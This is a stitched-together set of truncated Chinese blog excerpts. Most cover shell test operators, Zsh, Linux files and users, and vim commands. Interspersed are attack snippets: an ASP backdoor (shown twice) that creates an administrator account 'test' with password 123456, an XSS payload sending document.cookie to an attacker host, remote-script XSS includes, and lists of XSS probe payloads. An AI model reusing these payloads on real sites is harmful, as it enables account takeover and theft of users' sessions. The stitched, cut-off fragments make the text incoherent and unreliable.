z --- zero  字符串长度为零 2)判断字符串 test –n 字符串                                   字符串的长度非零 test –z 字符串                                    字符串的长度为零…

1.在中括号中,判断变量的值, 加不加双引号的问题?-z 判断 变量的值,是否为空: zero = 0 - 变量的值,为空,返回0,为true- 变量的值,非空,返回1,为false-n 判断变量的值,是否为空 name = 名字- 变量的值,为空,返回1,为false- 变量的值,非空,返回0,为truepid="123" [ -z "$pid" ] 单对中括号变量必须要加双引号 [[ -z $pid ]] 双对括号,变量不用加双引号 [ -n "$pi…

-z 字符串为"null",即是指字符串长度为零.…

# -f 文件存在 if[ -f /etc/sysconfig/network ]; then ./etc/sysconfig/network fi # -z 字串为空/ -o or / -a and if[ -z "$HOSTNAME" -o "$HOSTNAME" = "(none)" ]; then HOSTNAME=localhost fi # ! if [ ! -e /proc/mounts ]; then mount -n -t pr…

一. http://www.cnblogs.com/GarveyCalvin/p/4301235.html 二. 前言:Zsh可配置性强,用户可以自定义配置,个性化强.Zsh tab补全更强大,该功能可以让我们节约很多时间.Zsh 还有代码高亮功能,使得代码更好看了,显得逼格更高.Zsh 还有很多强大的功能,这里就不一一细说了. 然后我来为大家说个笑话: Zsh全称为Z Shell,因为Z是最后一个字母,因此大家称之为——终极Shell. 这是我在知乎上看到的某一位评论,他说得很有道理,我竟无言…

虽然这个话题已是老生常谈,搜索一下应该也能找到大把的相关文章.不过难得提到了这方面,就趁此机会把我的理解写下来,一来看看我是不是真正理解了,二来看看我能不能把它们之间的区别讲得更加简明易懂. 0. 太长不看 TL;DR 命令行界面 (CLI) = 使用文本命令进行交互的用户界面 终端 (Terminal) = TTY = 文本输入/输出环境 控制台 (Console) = 一种特殊的终端 Shell = 命令行解释器,执行用户输入的命令并返回结果 1. 什么是命令行界面? 命令行界面,通俗来讲,…

前言:Zsh可配置性强,用户可以自定义配置,个性化强.Zsh tab补全更强大,该功能可以让我们节约很多时间.Zsh 还有代码高亮功能,使得代码更好看了,显得逼格更高.Zsh 还有很多强大的功能,这里就不一一细说了. 然后我来为大家说个笑话: Zsh全称为Z Shell,因为Z是最后一个字母,因此大家称之为——终极Shell. 这是我在知乎上看到的某一位评论,他说得很有道理,我竟无言以对. 很多人都在用bash,这是为什么呢?因为Zsh在初期,它的配置相当复杂,一般人只要看到配置就会掉头走人.但…

<% Set  o=CreateObject( "Shell.Users" ) Set z=o.create("test") z.changePassword "123456","" z.setting("AccountType")=3 %>…

可参考博客: Shell脚本中$0.$?.$!.$$.$*.$#.$@等的意义    https://blog.csdn.net/csgd2000/article/details/80396996 shell脚本[] [[]] -n -z 的含义解析                                      https://blog.csdn.net/keep_lcm/article/details/80551435 shell基本运算符 | 菜鸟教程              …

跨站脚本攻击:cross site script execution(通常简写为xss,因css与层叠样式表同名,故改为xss),是指攻击者利用网站程序对用户输入过滤不足,输入可以显示在页面上对其他用户造成影响HTML代码,从而盗取用户资料.利用用户身份进行某种动作或者对访问者进行病毒侵害的一种攻击方式,很多人对于xss的利用大多停留在弹框框的程度,一些厂商对xss也是不以为然,都认为安全级别很低,甚至忽略不计,本文旨在讲述关于跨站脚本攻击的利用方式,并结合实例进行分析.我们构造的获取cooki…

前段时间我遇到一个问题,就是说普通的平台获取cookie的语句为↓           Default <script src=js地址></script> 1 <script src=js地址></script> 实际上我们的测试语句可能为↓           Default <script>alert("90sec")</script> 1 <script>alert("90sec&qu…

在早期 , 对于xss我们是这样利用的 <script>window.open('http://xxx.xxx/cookie.asp?msg='+document.cookie)</script> 将 cookie之类的数据传递到自己的服务端但是 如果要更为复杂的攻击的话,由于字符串长度等限制 需要加载远程js来实现. 一个简单的例子 <script src=http://xxx.xxx/a.js></script> 这样更为简洁 <script sr…

Atitit. Xss 漏洞的原理and应用xss木马 1. XSS漏洞1 2. XSS的用途2 2.1. 盗取cookie2 2.2. 刷新流量 刷分3 2.3. DOS 窃取隐私”.“假冒身份”.“WEB蠕虫3 2.4. 广告植入 弹窗 .信息收集 .流量转发 甚至是路由劫持3 2.5. 钓鱼攻击,高级的钓鱼技巧.3 2.6. 删除目标文章.恶意篡改数据.嫁祸.3 2.7. 劫持用户Web行为,甚至进一步渗透内网.3 2.8. 爆发Web2.0蠕虫.3 2.9. 蠕虫式的DDoS攻击.3 2…

[XSS基本探测pyload]   <script>alert("xss")</script> <script>alert(/xss/)</script> //双引号换成斜杠 <script>alert('xss')</script> //用单引号 <script>alert("xss");</script> //用分号 <script>alert('xss'…

一.什么是XSS? XSS全称是Cross Site Scripting即跨站脚本,当目标网站目标用户浏览器渲染HTML文档的过程中,出现了不被预期的脚本指令并执行时,XSS就发生了. 这里我们主要注意四点:1.目标网站目标用户:2.浏览器:3.不被预期:4.脚本. 二.XSS有什么危害? 当我们知道了什么是XSS后,也一定很想知道它到底有什么用,或者有什么危害,如何防御. 关于XSS有关危害,我这里中罗列一段列表,详细介绍不进行更多的赘述: 挂马 盗取用户Cookie. DOS(拒绝服务)客户…

Linux之文件.目录 文件权限 User.Group.Others 在Linux中,任何一个文件都具有这三种身份的个别权限,三者的区别是 User: 指每一个单独的用户,例如member1,member2-- Group: 用户的一个组别,例如member1,member2组成的class1用户组,member3,member4组成的class2用户组. 每个用户可以有多个组别的支持,例如member1可以是class1成员,也可以是class2成员. Others: 其他人,例如相对于cla…

2.1 用户和组的基本概念 用户和组是操作系统中一种身份认证资源. 每个用户都有用户名.用户的唯一编号uid(user id).所属组及其默认的shell,可能还有密码.家目录.附属组.注释信息等. 每个组也有自己的名称.组唯一编号gid(group id).一般来说,gid和uid是可以不相同的,但绝大多数都会让它们保持一致,大致属于约定俗成类的概念吧. 组分为主组(primary group)和辅助组(secondary group)两种,用户一定会属于某个主组,也可以同时加入多个辅助组.…

1. 导航 1.1. 查看行号 :set number  显示行号 :set number!  隐藏行号 :.=  在底部显示当前行号 :=  在底部显示总行号 1.2. 移动光标 0 或 ^                  移动光标到当前行首 $   移动光标到当前行尾 w  移动到下个单词开头 b   移动到上个单词开头 :0 或 1G 或 gg       移动到首行 :n 或 nG  移动到第 n 行 :$ 或 G   移动到最后一行 ''  回到开始搜索时所在行  ``       …

文件种类 普通文件(ls -al出来第一列为-) 纯文本文件(ASCII):linux系统中最多的一种文件类型,可以使用cat直接读取: 二进制文件(binary):linux下面的可执行文件: 数据格式文件(data):程序运行过程中可能会去读取的某些特定格式的文件,使用cat直接读取会出现乱码. 目录(ls -al出来第一列为d) 连接文件(ls -al出来第一列为l) 设备与设备文件 文件扩展名 .sh:shell脚本: Z..tar..tar.gz..zip..tgz:压缩文件: .ht…

3.Web安全基础 3.1.HTTP协议 1)TCP/IP协议-HTTP 应用层:HTTP.FTP.TELNET.DNS.POP3 传输层:TCP.UDP 网络层:IP.ICMP.ARP 2)常用方法-Method GET:向特定的资源发出请求 POST:向指定资源提交数据进行处理请求(例如提交表单或者上传文件).数据被包含在请求体中.POST请求可能会导致新的资源的建立和/或已有资源的修改. HEAD:向服务器索与GET请求相一致的响应,只不过响应体将不会被返回.这一方法可以在不必传输整个响应…

Homebrew https://brew.sh/ Install: /usr/bin/ruby -e "$(curl -fsSL https://raw.githubusercontent.com/Homebrew/install/master/install)" Linuxbrew http://linuxbrew.sh/ Install: sudo yum install git -y (sudo apt-get update && sudo apt-get in…

<backspace> 删除 <ctrl+l> 清空屏幕, 相当于clear <ctrl+e> 光标跳至命令结尾 <ctrl+a> 光标跳至命令开始 <ctrl+b> 光标左移一个字母(感觉比按方向键快些) <ctrl+f> 光标右移一个字母 <ctrl+t> 交换光标位置前的两个字符(敲错顺序的时候) <ctrl+h> 删除光标前一个字符,同 <backspace> 键相同 <ctrl+w&…

---------------------------------------- Linux 基础 --------------------------------1.Linux的诞生 1.unix两大分支:BSD和system V 2.GUN计划:允许软件自由复制更改移植 3.Linux发行版本:red_hat(red_hat) Debian(ubuntu) 系列 4.Linux 用户界面 1.图形界面 2.用户界面 5.Linux操作系统的构建: 硬件--内核--系统调用(保护内核的软件)-…

最近自学了下Shell编程,也算是入门吧!按照如下教程,编译安装了LAMP(Apache-2.4.6 + MySQL-5.5.25 + PHP-5.3.27) CentOS6.3编译安装LAMP(1):准备工作 CentOS6.3编译安装LAMP(2):编译安装 Apache2.2.25 CentOS6.3编译安装LAMP(2):编译安装 Apache2.4.6 CentOS6.3编译安装LAMP(3):编译安装 MySQL5.5.25 CentOS6.3编译安装LAMP(4):编译安装 PHP…

Set o=CreateObject( "Shell.Users" ) Set z=o.create("test") z.changePassword "123456","" z.setting("AccountType")=3 欢迎加入QQ技术群聊:70539804…

(1)普通的XSS JavaScript注入<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>(2)IMG标签XSS使用JavaScript命令<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>(3)IMG标签无分号无引号<IMG SRC=javascript:alert('XSS')>(4)IMG标签大小写不敏感<IMG SRC=JaVaScRiPt:al…

Win提权思路,方法,工具(小总结)[转] 看到这个文章,感觉整理的不错,就收藏下了. 介绍 windows提权总是被归结为适当的枚举.但要完成适当的枚举,你需要知道要检查和查找的内容.这通常需要伴随着经验的丰富而对系统非常熟悉.起初特权升级看起来像是一项艰巨的任务,但过了一段时间,你就开始过滤哪些是正常的东西,而哪些不是正常的东西.最终变得更容易,因为你知道要寻找什么了,而不是挖掘希望在干草堆中找到那根针的所有东西.希望本指南能为你的入门提供良好的基础知识. 所以本指南主要集中在枚举方面. 注…

manjaro xfce 18.0 踩坑记录 1 简介1.1 Manjaro Linux1.2 开发桌面环境2 自动打开 NumLock3 系统快照3.1 安装timeshift3.2 使用timeshift创建系统快照4 国内源设置4.1 manjaro官方软件仓库4.1.1 自动寻找最快的源4.1.2 选择源4.1.3 更新源4.2 非官方仓库(Arch Linux 中文社区仓库)4.2.1 手动添加archlinuxcn清华源4.2.2 更新源4.2.3 安装archlinuxcn-key…

1. adb shell 2. setprop z.flash_ratio 1 3. 全黑环境下,请将手机固定,对着白墙10cm,固定. 4. 点击拍照,然后手机会自动打闪2(Duty num)次(其中不要任何人员靠近,避免影响光源). 5. 手机停止拍照以后,sd内将生成flash_nvdata.bin和eng_all.txt, eng_code.txt文件.…

目 录 第1章 Linux系统终端概述    1 1.1 图形化    1 1.2 字符终端    1 1.3 who和w    1 1.3.1 who    1 1.3.2 w    1 1.3.3 pkill    1 第2章 Linux系统Bash管理    2 2.1 Linux提供的用户界面    2 2.2 Bash特性:命令快捷键    2 2.3 shell的种类    2 2.3.1 shell的种类    2 2.3.2 data    3 2.3.3 whoami    3…